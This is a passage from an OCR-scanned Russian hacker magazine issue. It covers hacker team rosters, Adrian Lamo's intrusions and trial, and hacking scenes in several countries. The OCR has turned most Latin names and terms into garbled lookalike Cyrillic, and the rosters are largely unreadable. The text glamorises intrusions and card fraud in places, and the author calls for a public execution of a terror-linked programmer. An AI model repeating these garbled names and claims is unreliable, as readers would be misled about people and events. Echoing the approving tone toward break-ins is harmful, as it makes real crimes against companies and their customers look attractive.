безусловно, встречал в X и на «лллл/.хакер.ш . В том числе и мои творения в РС20ЫЕ и Ѵ2ІХМ 5 Естественно, стоит упо- 
мянуть ВІаскІодіск. Куда же без этих профессионалов. Одним из известнейших членов этой команды является СоЬап, 
тот самый знаменитый творец Пинча, ТІСОІЛэ, НазЫІЬ и т.д. Ранее СоЬап состоял в ССТеат. С недавних пор группа вы- 
пускает Е-гіпе Риск'іп Ноах. 6 Команда А1_ІЕІ\І Наск была создана в марте 2003 года, до этого существовал небольшой 
проект, посвященный исследованию простых программных защит. 15 марта 2003 года был открыт первый веб-сайт, 
располагался он на бесплатном хостинге. С тех пор прошло достаточно много времени, команда значительно расши- 
рилась, сайт был полностью перестроен (от дизайна до содержимого). Что касается состава команды — за время их 
существования состав обновлялся не один раз, люди приходили и уходили. На момент создания команды в ней было 2 
человека. Прием в команду новых участников временно не производится, так что дорога тебе туда закрыта, даже если 
ты семи пядей во лбу. 7 В самом начале своего пути команда Асоіуіеі носила имя ЗІазЬ. Название Асоіуіег переводит- 
ся как «Темники». Один из бывших членов — Сгаск — сейчас ушел в ВЗТ. Направление их деятельности стало все боль- 
ше и больше ориентироваться на анализ программ и поиск в них багов, чем на дефейсы, которые совершались ради 
пиара. Цель команды — стать авторитетными специалистами в области сетевой безопасности и программирования се- 
тевых приложений. 8 ЫтрісІ Вуіе был создан в январе 2002 года как перевоплощение ОІЫ Огоир. Пожалуй, главный ло- 
зунг команды таков: «Мы выступаем против коммерциализации всемирной Сети — доступ к компьютерам должен быть 
НЕОГРАНИЧЕННЫМ и ПОЛНЫМ» . Их цель — заставить изменить мнение интернациональной общественности относи- 
тельно хакеров: «Мы надеемся постепенно реализовать эту цель в течение нашего существования, вера в исполнение 
нашей цели объединяет Ьітрісі Вуіе со многими видными личностями андеграунда.» 9 «Мы — Главное Зло Рунета!» — 
объявляют создатели. Команда ориентируется на ѴХ/ ВАТ/ и ЗЕСІІВІТУ/Наскіпд. Основана в сентябре 2005 года. Один из 
самых известных мемберов — _1 п13сЮг_. Его статьи ты мог встретить в нашем журнале ина «лллл/.хакер.ги 
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Сопсіог, мООР, 
_5РіКіТ_, 
гіССу, Заііг, 
еХр . 10 2 Іѵ, 
тід, 
дгОЪіп, 

Ееаг 



№гР: 

ѵірее, Сапсіт, 
ирііпе, 

аІрЪапитегіс, мк 



ІІпІОск: 

пексЮ, сЬоіх, 

Багкеадіе, 

рауЪазЬ 



Ви24 Зесигііу Теат: 

Ыіігех, Рокк21, 
БгеАтеКг , 
с1к_(11з) , 
СасіЕІу, ЗЬасЮЗ, 
гоОзСУ, з0 



ВІаскІ_одіс: 

Еіех [ІР] , 
500тН2, сігеп, 
сіМШ:, азСгО, 
соЪап2к, ТіХ 



АиЕІЧ Наск Теат: 

ЕЕиЕКРАРЕК, 
ЫОмОгМ, ѴіЫСЕ, 

ЗЬ, ВаРКЗіОЕ, з зх , 
СОсіЕХрЬОгЕР, ТО г О 



Асоіуіег: 

КОгОІ, 
210у_Тар0к, 
Еіихзісіег, 
СЬегер, Ъагсі- 
соге, рЪ34гсі, 
дасі-зрісіег, 
МгХаК, Сгагу 
Ыіск 



ЫтрісІ Вуіе: 

ак [ісі] , 
гООтКіЫег , 
татОпІ:, 
еа37 

НеІІ КпідМз: 

Заііех Ыеѵіііеп 

_1пЕЗс1;0г_, 

МЗІсІу, 

©уВе®0дЕ№, 

хк4ск 



ХАКЕР 03 /87/ 06 



юз 



СЦЕНА 




УаИоо!, МісгозоЙ, АОЬ Тіте ѴѴагпег, Ехсі1е@Ноте, МСІ ѴѴогІсІСот, ЫЗА сопігасіог СЗС, Сіпдиіаг, 
ТЬе Ые\л/ Уогк Тітез — не каждый взломщик способен проникнуть в корпоративные сети этих 
крупнейших компаний. Но нет ничего невозможного, ведь все эти названия входят в «послужной 
список» американского хакера Адриана Ламо, прозванного прессой «бездомным хакером». 
Еще одним прозвищем Адриана стало беіріиі Ьаскег, то есть «полезный хакер». Почему — 
читай дальше. 
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ТЕХТ ВОЗЗОМАНААР / П0880МАНААП@МАІІ_.Я1І / 



Жизненный путь 
бездомного хакера 




Детство хакера 



Адриан Ламо родился в 1981 году на севере США в Бостоне, штат Массачусетс. Через некоторое время его семья 
переехала в Сан-Франциско, там он и провел свои школьные годы. Впервые с компьютером Адриан столкнулся в возрасте 
6 — 7 лет — отец был обладателем популярного тогда Соттобоге 64. Жертвами первых «взломов» парня стали текстовые 
адвенчуры. 

Когда ему исполнилось семнадцать, родители решили уехать из Сан-Франциско в более тихое и спокойное место, 
которым оказалось Сакраменто. Адриану идея переезда совсем не понравилась — для него жизнь в шумных городских 
кварталах была куда привычнее, чем в пригородных спальных районах. Он пожелал остаться в большом городе, тем более 
что к этому времени он как раз закончил свое школьное обучение. Так, не имея серьезного образования и крыши над голо- 
вой, Ламо приходится заботиться о себе самому. 

Так как он к этому времени уже обладал неплохими компьютерными знаниями, Адриан начинает подрабатывать в 
различных фирмах, выполняя работу, связанную с компами, при этом частенько остается ночевать прямо в офисе. Чуть 
позже ему удалось устроиться консультантом по информационной безопасности в знаменитую фирму І_еѵі Бігаизз, правда, 
пробыл он там всего 3 месяца. Это единственная работа, связанная с информационной безопасностью, которая может 
быть представлена в его резюме. Места его обитания в последующие полгода покрыты завесой тайны, которую сам Адриан 
раскрывать не хочет. В конце концов хакер забросил офисную жизнь и пустился в кочевые странствия. 



Компьютерный бродяга 

Он путешествовал по стране, имея при себе лишь рюкзак, в котором находились его любимый ноутбук, набор первой 
медицинской помощи, комплект сменной одежды и теплое одеяло. Именно в этот период Адриан Ламо совершил свои, став- 
шие знаменитыми, взломы крупнейших корпоративных информационных систем. Проделаны они были на ноуте «Тошиба» 
с двумя отсутствующими на клавиатуре клавишами, из интернет-кафе или других местах с доступом в инет по ѴѴІ-РІ. Причем 
для проникновения в защищенные сети хакер использовал лишь браузер и сканер ір-адресов. 

Из-за отсутствия водительских прав по стране он передвигался автостопом, тем более что при таком способе можно 
было путешествовать анонимно. А когда приходилось пересекать большие расстояния, он делал это на рейсовых автобу- 
сах и поездах. Наиболее частыми местами обитания Ламо были Сан-Франциско, Филадельфия, предместья Вашингтона и 
Питсбург, время от времени он также посещал Сакраменто. Ночи хакер проводил чаще всего в интернет-кафе, иногда оста- 
навливаясь у друзей. Изредка ночевал в заброшенных зданиях и на строительных площадках. «Я нахожусь постоянно в дви- 
жении, подобно Саддаму Хусейну, — не более двух ночей в одном месте», — заявил в одном из своих интервью Адриан. 

Свои взломы хакер совершал самостоятельно, в течение нескольких месяцев изучая «жертв». А иногда вместе с дру- 
зьями выходил поохотиться на интересную макулатуру в мусорных баках неподалеку от офисов крупных фирм. В сентябре 
2001 Ламо проникает в систему публикации новостей УаНоо! Иеѵѵв. Взлом так бы и остался незамеченным админами, 
если бы Адриан сам не написал о нем на ЗесигіІуРосиз'е. Единственное, что хакер изменил в системе, — это содержание 
нескольких статей. Например, в статье об арестованном тогда в США Дмитрии Склярове он «подправил» возможную меру 
наказания, в результате чего Склярову якобы грозила смертная казнь. 

А еще через месяц Ламо удалось хакнуть Місгозоіі и проникнуть в базу данных о клиентах этой компании, купивших 
продукты мелкомягких по Сети. 



ХАКЕР 03 /87/ 06 



105 



СЦЕНА 



«Полезный» хакер 

Адриан никогда не преследовал каких-либо корыстных целей своими взломами. Как он сам говорил, все это проде- 
лывалось только ради любопытства. Да и слово «хакер» не любил употреблять по отношению к себе, предпочитая термин 
«исследователь безопасности». Несмотря на это, с юридической точки зрения, каждый его взлом являлся серьезным пре- 
ступлением, тем более в США с их строгими компьютерными законами. Ситуация отягощалась тем, что жертвами взломов 
Ламо становились солидные и влиятельные корпорации. Но до сих пор ему все сходило с рук. Адриан всегда сообщал о 
найденных им уязвимостях и даже способствовал их устранению. За это пресса окрестила его «помогающим хакером». 

В декабре 2001 года на сайте ЗесигіІуРосиз появилась статья Кевина Поулсена о проникновении Адриана Ламо во 
внутреннюю сеть коммуникационного гиганта ѴѴогІсІСот — крупнейшего интернет-провайдера США. Как обычно, для этого 
взлома Адриан использовал браузер и сканер ір-адресов (тулза называется ргоху-ИипІег, позволяет с огромной скоростью 
искать ЗОСКЗ-прокси в заданном диапазоне ІР, даже на модемном соединении), с помощью которого сканировал адресное 
пространство серверов компании на наличие скрытых прокси-серверов, служащих гейтами между Интернетом и внутрен- 
ней сетью. Таких серверов удалось обнаружить аж пять штук, причем один из них находился на основном сайте ѵѵігеіезз. 
ѵѵсот.сот . Под видом служащего Адриан принялся изучать внутреннюю сеть компании и вскоре наткнулся на несколько 
уровней защиты, разграничивающих доступ к информации различным должностным лицам. 

Проведя за исследованием сети ѴѴогІбСот'а около двух месяцев, хакер получил доступ к базе данных по 86 тысячам 
работников компании, включая информацию об их кредитных картах. Помимо этого, он мог отслеживать инфу, циркулиру- 
ющую между головным офисом компании и ее мексиканским подразделением. Но главное — Ламо удалось взять под кон- 
троль систему ѴѴАВМ (ѴѴеЬ Асеева Роиіег Маіпіепапсе ІооІ) — приложение, контролирующее вое маршрутизаторы внутри 
закрытых сетей таких организаций, как Вапк оі Атегіса, ЗР Могдап, Сііісогр, Зип Місгозузіетз и АОІ_ (в 1997 году ѴѴогІсІСот 
купил за 175 миллионов долларов компанию АІ\ІЗ Соттипісаііопз, разработавшую ѴѴАВМ). Вмешательство в работу данной 
системы со стороны взломщика могло бы нанести огромный ущерб перечисленным выше компаниям. А ведь доступ к этой 
системе мог при желании получить любой сотрудник — пароль доступа проверялся обычным іаѵазсгірі'ом и находился в 
исходном коде страницы доступа. «Для сотрудников ѴѴогІсІСот весь их Интернет — это скучная штуковина в браузере. 
Для меня — это гигантская игровая площадка, службы безопасности которой вежливо пропускают туда, куда мне надо», 
— произнес позже Ламо. 

После двухмесячного блуждания в корпоративной сети ѴѴогІсІСот'а Адриан через ЗесигіІуРосиз связался с компани- 
ей, указав на все найденные им уязвимости. Уже на следующий день они позвонили на мобильник хакера, внимательно 
выслушав его рекомендации по устранению прорех в безопасности, а после их ликвидации предложили вновь про- 
тестировать систему на возможность несанкционированного вторжения. В конце концов компания осталась довольна 
сотрудничеством, предъявив взломщику лишь требование подписать договор о неразглашении конфиденциальной 
информации. 

И это далеко не единственный случай сотрудничества Ламо с компаниями, сети которых были им взломаны. РІапример, 
получив доступ к записям миллионов клиентов уже несуществующей сегодня фирме Ехсі(е@Ноте, он сам пришел в ее 
калифорнийский офис, чтобы встретиться с администраторами сети и указать им на прорехи в безопасности. 



Известность 




Серия громких взломов и необычный образ жизни привлекали все больше внимания прессы. Об Адриане Ламо стали 
писать ведущие печатные издания Америки. Сам он был совсем не против такой славы, наоборот, охотно раздавал интер- 
вью журналистам. В это время хакер постоянно балансирует на грани закона, журналы пишут, что при желании пострадав- 
шие от взломов компании легко упрячут хакера за решетку. Но отсутствие каких-либо вредоносных действий с его стороны 
и готовность сотрудничества пока сдерживает их от этого, кроме того, судебный процесс с Ламо повредил бы имиджу 
любой компании — общественность наверняка займет защищающую хакера позицию. 

Однажды журналист 1МВС предложил Адриану проникнуть во внутреннюю сеть самой телекомпании под объективом 
камеры. Как ни странно, хакер согласился, и заснятый материал должен был попасть в эфир ночных новостей. Но на 
студии материал сняли с трансляции, и серьезно призадумались над юридической составляющей этого эпизода. С одной 
стороны, разрешения на взлом не было, а значит, имел место факт компьютерного преступления. С другой стороны, при 
этом присутствовал журналист и оператор самой компании, не судить же их как сообщников? 

В компьютерном андеграунде мнения о Ламо разделились: для одних он стал героем и даже кумиром, другие критико- 
вали его, обвиняя в принадлежности к армии скрипткидисов, а также в позировании перед прессой. Но каким бы ни был 
любимчиком прессы Адриан, именно с ней у него в итоге были большие проблемы. 

26 февраля 2002 года на ЗесигіІуРосиз'е появляется заметка Кевина Поулсена о взломе корпоративной сети ІМеѵѵ Ѵогк 
Тітез. В ней говорилось, что слабое место в защите сети компании Адриану удалось найти уже после двух минут ее изуче- 
ния — на первом же обнаруженном им сервере находился открытый прокси-сервер. Настроив на эту проксю браузер, хакер 
проник во внутреннюю сеть, где открыл еще несколько уязвимостей в системе разграничения доступа. В результате взлома 
ему удалось получить доступ к личным данным 3-х тысяч человек, публиковавших свои статьи в газете и тех, кто давал для 
нее интервью. А так как в газете фигурировало немало крупных государственных чиновников, политиков и бизнесменов, 
среди которых были бывший госсекретарь США Джеймс Бейкер, инспектор по вооружениям Ричард Батлер, бывший пре- 
зидент США Рональд Рейган, Ясир Арафат и даже Билл Г ейтс, то данная информация уже сама по себе вызывала интерес. 
Ради забавы Ламо внес себя в список сотрудников газеты как специалиста по информационной безопасности, а после 
этого проинформировал администрацию сети о найденных уязвимостях. В №ѵѵ Ѵогк Тітез началось внутреннее расследо- 
вание, и в результате компания обратилась в полицию, обвиняя хакера в несанкционированном проникновении и хищении 
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паролей. Кроме того, Ламо обвиняли в использовании информационной системы БехізЫехіз по учетным записям Таймс и 
оценили нанесенный им совокупный ущерб в 300 тысяч долларов. Подобные обвинения по законодательству США суммар- 
но тянули на 5 — 15 лет тюремного заключения и громадный штраф. Дело передали в ФБР, где началось продолжительное 
следствие против хакера. 



Суд 

К этому времени Адриан начал осознавать, что его деятельность не всем может прийтись по душе, но вое равно он 
не оставил позицию «помогающего хакера». На конференции «Информационная безопасность в эпоху терроризма», 
организованной Американской Ассоциацией Менеджмента, Ламо впервые выступил с речью, посвященной сетевой безо- 
пасности. В своем выступлении он встал на защиту тех хакеров, деятельность которых не приносит ущерба компаниям 
и которые помогают устранить обнаруженные уязвимости, призывая относиться о пониманием к их деятельности и не 
видеть в них преступников. 

Тем временем агенты ФБР расспрашивали знакомых Адриана Ламо, пытаясь собрать компрометирующие материалы. 
Изучались прошлые взломы. В июне расследование в отношении Ламо стало широко известным — ФБР попыталось изъять 
у репортера, бравшего у хакера интервью, информацию о способах связи о ним, а также материалы самого интервью. Но 
по законам США подобные действия незаконны без специального разрешения Министерства юстиции. В результате чего 
произошел небольшой скандал в прессе. 

И вот в начале сентября 2003 года судья выписывает ордер на арест Ламо. Агенты ФБР посетили дом его родителей, 
где, конечно, никого не обнаружили. За домом было установлено наблюдение, о чем хакер узнал несколько дней спустя. 
Адриан пытался несколько дней скрываться, но 9 сентября, после переговоров с ФБР через адвоката, решил сам сдаться 
властям. Продержав ночь в камере, его выпустили под залог в 250 тысяч долларов — родители поручились своим домом 
— с условием, что через несколько дней он предстанет перед федеральным судьей Нью-Йорка. 

На заседании суда в Манхэттене Ламо обязали находиться некоторое время под домашним арестом и частично огра- 
ничили его пользование Интернетом. Одновременно с этим в Сети развернулась акция поддержки хакера — Ігееіато.согл . 
Там публиковались последние известия о ходе следствия, выкладывались свежие интервью и т.п. Через несколько месяцев 
судебных заседаний Адриан Ламо признал себя виновным в предъявляемых ему обвинениях, еще несколько месяцев потре- 
бовалось суду, чтобы вынести приговор. Адриана приговорили к полугодичному домашнему аресту, 2-м годам нахождения 
под условным наблюдением и штрафу в размере 65 тысяч долларов. Достаточно мягкий приговор, учитывая требования 
истцов и старания ФБР включить в дело эпизоды из прошлого (например, взлом мелкомягких). Кроме того, Ламо обязали 
на протяжении условного срока работать или продолжить свою учебу. 



Конец истории? 

Как и требовал суд, Ламо поселился в доме своих родителей, решив продолжить обучение. Он поступил в колледж 
Сакраменто на факультет журналистики, и теперь пресса уже намного реже пишет о его громких взломах и практически 
не публикует его интервью. Так закончилась история бездомного хакера? Кто знает. В одном из первых своих интервью 
Адриан произнес: «Я согласен с тем, что взлом сайтов — не самый безопасный способ убивать свободное время. Если меня 
посадят, значит, так тому и быть». Отсюда понятно, что хакерство для него нечто большее, чем просто развлечение или 
хобби, это, как он сам однажды сказал, его религия. Кевин Поулсен в своей статье Бато'з Асіѵепіигез іп ѴѴогІбСот назвал 
Ламо представителем нового поколения, не представляющего окружающее общество без персональных компьютеров, 
поколения, живущего в цифровом мире. И если это так, то Адриан Ламо еще наверняка заявит о себе. 

віыднѵ ѵоив’з т 
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/ ІІ.ѴА АІ_в ВАМВІ_ЕР.ВІІ / 




Твой любимый журнал постоянно рассказывает 
тебе о крупнейших хакерских проектах, компью- 
терщиках-легендах и нашумевших взломах. Но 
так получилось, что главным образом мы писа- 
ли об американской и русской хак-сценах. Что- 
бы у тебя не сложилось мнение, что в других 
странах компьютерные взломщики вымерли, 
как динозавры, я расскажу тебе о компьютерных 
гениях Бразилии, Китая, Африки и других стран. 




специалистов по кредитным картам на Украине хватает 



Как хакают за бугром? 

Специфика взлома на краях 
географии 



Украинским взломщикам приписывают атаку 
на британский банк ВоуаІ Вапк о? ЗсоІІапс) в 2003 году 




УКРАИНА 

Наши близкие соседи тоже не вче- 
ра за РС сели. Именно украинским 
хакером, Дмитрием Голубовым, 
был создан легендарный портал 
СагбегрІапеГсогп . На сайте прода- 
вались номера краденых кредитных 
карт и пин-коды к ним, а также ра- 
ботал популярнейший форум. «Пла- 
нета» считалась центром общения 
всего российского компьютерного 
андеграунда, и в ее жизни принима- 
ли участие порядка 7 000 человек. 
По сведениям британской полиции, 
Голубов и его сообщники на мо- 
шеннических операциях с кредит- 
ными картами с 2003 по 2005 год за- 
работали более 12 миллионов дол- 
ларов. Сейчас сайт закрыт (нас- 
колько я знаю, «Планету» просто 
перенесли на другой домен, а фо- 
рум там является закрытым для пос- 
торонних. — Прим. тіпсІѵѵОгк), анг- 



лийские сообщники Дмитрия осуж- 
дены на сроки от четырех до шести 
лет, а сам Голубов находится под 
следствием. 

Но самый крутой украинский хакер — 
это, без сомнения, Максим Высочанс- 
кий (настоящая фамилия Ковальчук). 
Макс взламывал компьютеры извест- 
ных компаний: АбоЬе, МісгозоЙ, 
АиІсЮезк, сливал у них ПО и продавал 
его на сетевых аукционах. Спрос, сам 
понимаешь, был огромный, и ущерб 
корпораций оценивается в районе пя- 
ти миллионов долларов. Ковальчука 
арестовали во время его отдыха в Та- 
иланде, где хакер просаживал зара- 
ботанные денежки, после чего отпра- 
вили в США. Ковальчуку грозит до 4 
лет лишения свободы и крупный де- 
нежный штраф. 

Украинским взломщикам приписыва- 
ют атаку на британский банк ПоуаІ 
Вапк оі ЗсоІІапсІ в 2003 году, компью- 
теры которых после этого были пере- 
загружены и некоторое время не мог- 
ли работать. В целом же хаксцена Ук- 
раины показалась мне достаточно не- 
развитой, хотя талантов, особенно 
кардеров, хватает. 
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принимали участие порядка 7000 человек 




КИТАЙ 

Среди полутора миллиарда жителей Поднебес- 
ной в любом случае найдутся талантливые 
компьютерщики, учитывая то, что каждый деся- 
тый в этой стране является пользователем Ин- 
тернета. Впервые местные умельцы громко зая- 
вили о себе в 1 999 году, когда во время бомбар- 
дировок Югославии американские самолеты 
разрушили Китайское посольство в Белграде. 
Ответом на это стали взломы сайтов Министер- 
ства энергетики, Министерства внутренних дел, 
Белого Дома и некоторых других. На каждой из 
хакнутых паг были вывешены обвинения в ад- 
рес властей США и традиционные фразы в ду- 
хе: «Уапкее, до Йоте!». Но в целом эта атака 
была плохо организованной и нанесла не са- 
мый большой ущерб. Куда активней действова- 
ла кибернетическая элита в середине 2001 го- 
да, объединившись в «Союз хакеров Китая». 
Это хакерское объединение стало одним из са- 
мых многочисленных в мире. Основано оно бы- 
ло после столкновения китайского истребителя 
и американского самолета-разведчика, в ре- 



зультате чего пилот Ванг Вей погиб. Хакеры за- 
дефейсили и заЭЭоЗили более тысячи порта- 
лов в зонах .аоѵ и .сот , разместив на титульных 
страницах тексты в память о погибшем летчике. 
Их американские коллеги, впрочем, в долгу не 
остались и провели масштабную атаку на Ки- 
тайский сегмент Интернета. 

В феврале 2005 года Г у Вэй — один из лиде- 
ров «Союза Хакеров» и один из самых извест- 
ных китайских хакеров — заявил о роспуске 
организации. В прощальном заявлении было 
сказано, что они уже не испытывают такого па- 
фоса и страсти, занимаясь своим любимым де- 
лом. А жаль, классная была команда. До ухода 
на пенсию Гу Вэй и его сотоварищи успели 
уничтожить порядка 120 тайваньских сайтов, 
выступая против президентских выборов в 
этой республики. Наибольший переполох выз- 
вал дефейс портала МсЭопаІбз — взломщики 
вывесили на главной странице череп с костями 
и написали: «Протестую против сайта, где Тай- 
вань указан как страна». 

Быть хакером в Китае — опасно для жизни. 
В 1998 году братья-близнецы, Жинлон Хао и 
Джинвен Хао, были приговорены к смертной 
казни за взлом компьютерной банковской сети и 
кражу 80,000 долларов. Это не единственный 
пример, правда, обычно несчастные компьютер- 
ные гении отделываются сроком до 25 лет. Нака- 



зание за распространение вирусов на порядок 
легче — всего пять лет. Поэтому оставшиеся на 
свободе вирмейкеры продолжают свою подрыв- 
ную деятельность. Вспомнить хотя бы вирус 
ЗОБЗІаттег, написанный хакером под ником 
І_іоп, за несколько часов заваливший тысячи 
серверов с МісгозоЙ ЗОБ. Вирус Собе Веб, из-за 
эпидемии которого серверы Белого дома в свое 
время были переведены на Біпих, также выпус- 
тили в Сеть китайцы. Правда, кто именно, — не- 
известно. 

Если верить словам ФБР, Китайская власть не 
только сажает хакеров в тюрьму пачками, но и 
охотно использует их в своих целях. Г руппа ки- 
тайских взломщиков — «Титановый дождь» — 
украла ПО планирования полетов, применяемое 
в военно-воздушных войсках, а также некие до- 
кументы, касающиеся разработки вертолетов. 
Министерство обороны не сомневается, что это 
сделали именно китайцы, называют даже место 
дислокации и количество мемберов в группе. 
Откуда у них такие сведения, впрочем, неясно. 
Еще можно вспомнить хак-тиму Хіосиз Теат, изве- 
стную своими эксплойтами для ѴѴіпбоѵѵз. Хотя по 
части эксплойтостроен ия китайцы сильно уступа- 
ют своим заокеанским и европейским конкурен- 
там. О хакерстве в Китае можно делать отдельный 
материал, поэтому если хочешь больше узнать о 
местных компьютерных традициях, юзай гугл. 
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I /ВЕЛИКОБРИТАНИЯ 



АНГЛИЯ 

В такой продвинутой в компьютерном плане 
стране, как Англия, с хакерством дела обстоят 
не очень. Сцены как таковой нет, хотя отдель- 
ные яркие личности присутствуют. Например, 
Арон Кеффри. Этот 19-летний юноша в 2000 го- 
ду парализовал работу крупнейшего морского 
порта США, выведя из строя его главный сер- 
вер. Кеффри, который страдает редкой фор- 
мой аутизма, сказал, что он ничего плохого не 
хотел сделать — всего лишь собирался зафлу- 
дить компьютер собеседницы по чату, плохо 
высказывавшейся в его адрес. Ну, и для этих 
целей использовал мощный портовый сервак. 
Парня отправили лечиться в психбольницу, хотя 
сомневаюсь, что умственно отсталый человек 
способен совершить подобный взлом. 

Другой англичанин — 31 -летний программер 
Бабар Ахмад — сотрудничал с организацией 
«Аль-Каеда» и конструировал массу происла- 
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мистких сайтов, целью которых был сбор денег 
для финансирования террористических группи- 
ровок. Сейчас Бабара экспортировали в США, 
где и будет произведен суд. Не знаю, как ты, а я 
бы хотел, чтобы таких гадов публично казнили 
посредством электрического стула. 

Впрочем, среди британцев попадаются и менее 
аморальные существа. Мэтью Бивэн, которого в 
начале 90-х обвиняли в проникновение в воен- 
ные системы США, официально прощен и при- 
нят на работу экспертом безопасности в 
ІЧіпІепсІо. Теперь вместо хакерства чувак следит 
за тем, чтобы в игрушки не вклеивали вирусы. 
Еще хочется упомянуть Рафаила Грея, проде- 
монстрировавшего истинно английский юмор. 
Студент подрабатывал взломом электронных 
магазинов, и однажды в его нечистые руки по- 
пали данные с креды самого богатого человека 
планеты (никогда бы не подумал, что Билли за- 
купается барахлом в Сети). Снял бы пару десят- 
ков миллионов (Гейтс бы вряд ли заметил) и 
свалил бы на Г авайи, так ведь выпендриться ре- 
шил. Отправил по домашнему адресу главы 
МелкоСофта огромную партию «ВиаГры». Пар- 
ня отыскали, засудили и приговорили к трем го- 
дам общественно-полезных работ. Смягчаю- 



щим обстоятельством стало то, что в 14 лет 
Г рей сильно ударился головой и у него появи- 
лись некоторые психические расстройства. 

А самым знаменитым британским компьютер- 
щиком стал Гарри Маккинон. 39-летний безра- 
ботный из Лондона проник в неприступные сети 
ЫАЗА и Пентагона, где, как он утверждал, на- 
шел доказательства связи правительства США 
с инопланетянами. Наверное, именно о марсиа- 
нах Маккинон будет рассказывать сокамерни- 
кам, отбывая срок в окружной тюрьме. Но не ду- 
май, что Гарри — очередной псих. По собствен- 
ному признанию, во время взлома он просто 
курнул «легкие наркотики». Вот такая вот весе- 
лая на туманном Альбионе хаксцена — сумас- 
шедше-наркоманская . 

I 

Г арри Маккиннон — он ломал ЫАЗА 
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Эндрю Мортон, известный английский кернел-хакер 
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БРАЗИЛИЯ 

Пришла очередь поговорить о стране, которая, 
по мнению зесигііу-аналитиков, становится 
центром мировой киберпреступности. Впрочем, 
это и без аналитиков понятно, так как любой ха- 
кер знает, что самые свежие эксплойты есть 
только у бразильцев. Так уж повелось. 

Именно Бразилии принадлежит рекорд по коли- 
честву взлома сайтов за сутки — в августе 2002 
года латиноамериканские хакеры хакнули 838 
сайтов. Такая активность была приурочена к вы- 
игрышу бразильской сборной чемпионата мира 
по футболу, который в этой стране возведен 
чуть ли не в ранг национальной идеи. 
Бразильская хакгруппа бахОгз, состоящая из 
трех человек, стала настоящим ужасом для 
итальянских ѵѵеЬ-дизайнеров и программистов. 
Команда ломает в среднем по пятьсот итальянс- 
ких сайтов в год — видимо, кого-то из хакеров в 
детстве обидела сицилийская мафия. В самом 



же бразильском сегменте сети совершается 
взломов в 6 раз больше, чем в любой другой 
стране мира. Самыми сильными группами счи- 
таются Ѵігіиаі НеІІ и Вгеакіпд Ѵоиг Зесигііу, хотя 
они и не так известны, как европейские тимы. 
Ѵіііиаі НеІІ, помимо всего прочего, однажды за- 
хачила и наш отечественный сайт. Жертвой 
стал портал города Горно-Алтайска. Если же 
выделять кого-нибудь персонально, то хочется 
отметить Эндрю Фукса — системного инжене- 
ра, обнаружившего массу уязвимостей в 
ѴѴіпбоѵѵз и *піх-системах, автора множества 
эксплойтов. Эндрю — один из самых уважае- 
мых зесигйу-аналитиков в мире. 

В 2003 году проект 2опе-Н.сот проводил чем- 
пионат мира по хакингу. Победителем стал 
бразильский компьютерщик с ником РегесГЬг, 
которому за определенное время удалось вы- 
вести из строя сайтов вдвое больше, чем его 
ближайшему сопернику. Этот хакер стал из- 
вестен после взлома официального портала 
фильма ѴѴаг оі Фе ѵѵогібз, где он заменил трей- 
лер фильма на черно-белые фотографии. 
Подобная активность компьютерных взломщи- 
ков объясняется слабостью законодательства 
страны, так как сам по себе взлом ПК не счи- 



тается преступлением. 

Но если в области сетевого взлома с бразильс- 
кими хакерами еще можно потягаться, то их 
вирмейкеры уж точно впереди планеты всей. 
Вирусописатель Ѵеспа в свое время открыл но- 
вую страницу в области червестроения — его 
вирус ВаЬуІопіа имел функцию самообновле- 
ния. Теперь таких червей гуляет по Сети мас- 
са. Бразильские компьютерщики создали це- 
лое семейство заразы, которая переводит 
деньги со счетов пользователей банков на 
счета хакеров: гоіап-5ру.ѴѴіп32.Вапкег, Тгоіап- 
Зру.ѴѴіп32.Вапсоз, Тго]ап-Зру.ѴѴіп32.Вапраез... 
Эти трояны принесли своим создателям более 
30 миллионов долларов. А бразилец Маркос 
Веласко модифицировал и дал вторую жизнь 
знаменитому червю СаЫг, который теперь за- 
ражает зіз-файлы. 

Бразилия является мировым притоном для сете- 
вой порнографии. Две трети сайтов, посвящен- 
ных детской порнушке, созданы бразильскими 
порнобаронами. Сетевое мошенничество тоже 
достигает здесь колоссальных масштабов. Ко- 
личество денег, которое бразильцы теряют из- 
за аферистов в Интернете, на порядок превы- 
шает потери от традиционных грабежей. 
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1987 год — взолм ЫАЗА 



ГЕРМАНИЯ 

Долгие годы словосочетания «немецкие хакеры» 
и «СНаоз Сотриіег сІиЬ» являлись синонимами. 
Я не буду рассказывать тебе историю ССС — 
это уже делал тіпбѵѵОгк в одном из старых но- 
меров Хакера. Напомню только, что к концу 80-х 
это была крупнейшая хакерская организация в 
мире, а в 1987 они совершили свой самый гром- 
кий взлом, захватив контроль над компьютер- 
ной сетью ЫАЗА. Несмотря на то, что организа- 
ция существует по сей день, а в 2001 группа от- 
метила свой 20-летний юбилей, «Хаос» — ско- 
рее великое прошлое, чем грозное настоящее. 
Кроме того, был убит Борис Флорициз — ста- 
рейший член группы. Его товарищи по клубу 
считают, что в смерти виновата либо корпора- 
ция ЭеиІзсНе Теіекот — активисты группы пос- 
тоянно подделывают карточки оплаты связи 
этой компании, либо немецкие спецслужбы. 



Тем не менее, на смену ветеранам идут достой- 
ные парни. Например, Свен Яшан, создатель 
вируса Заззег, принесшего миллионные убытки 
компаниям по всему миру, выводя из строя уста- 
новленные на ПК винды. Причем его не нужно 
было распространять по электронной почте — 
вирь сам загружался на атакуемый компьютер 
из Сети. За информацию об авторе червя 
МісгозоК в свое время назначила награду в 250 
тысяч долларов. 

Немецкая крэкерская группа Вабіит занимает 
ведущие позиции среди взломщиков музыкаль- 
ного софта. Из-за нее в свое время разгорелся 
настоящий скандал. В ѴѴАѴ-файлах, поставляе- 
мых вместе с ОС ѴѴіпбоѵѵз, при просмотре оных, 
в блокноте можно увидеть строчку: «І_І5ТВ 
ІЫРОІСРЮ 2000-04-06 ІЕЫО ЭеергОпе ІЗГГ ЗоипсІ 
Рогде 4.5. ЭеергОпе». Это значит, что файлики 
создавались с помощью крэкнутой «радиумом» 
версии ЗоипбРогде. ЭеерЛЗпе — это лидер 
группы. Еще одни известные крэкеры — ТИе 
Сегггап Сотриіег Ргеакз, которые, помимо про- 
чего, занимаются разработкой эксплойтов. 
Очень сильной сейчас стала команда ТНС (ТНе 
Наскег'з СИоісе). Эти парни создали брутфор- 



сер Нубга, о котором делал материал ЫЗЭ, 
а также написали множество утилит для хака 
беспроводных сетей. Лидер группы — Ван Хау- 
зер — работает сейчас в Зизе І_іпих. 
Любимчиком прессы среди немецких хакеров 
является Ким Шмитц. 30-тилетний мужик в свое 
время имел славу хакера-вундеркинда, а после 
прославился как предприимчивый бизнесмен. 
Ким создал группу «Молодые хакеры-интеллек- 
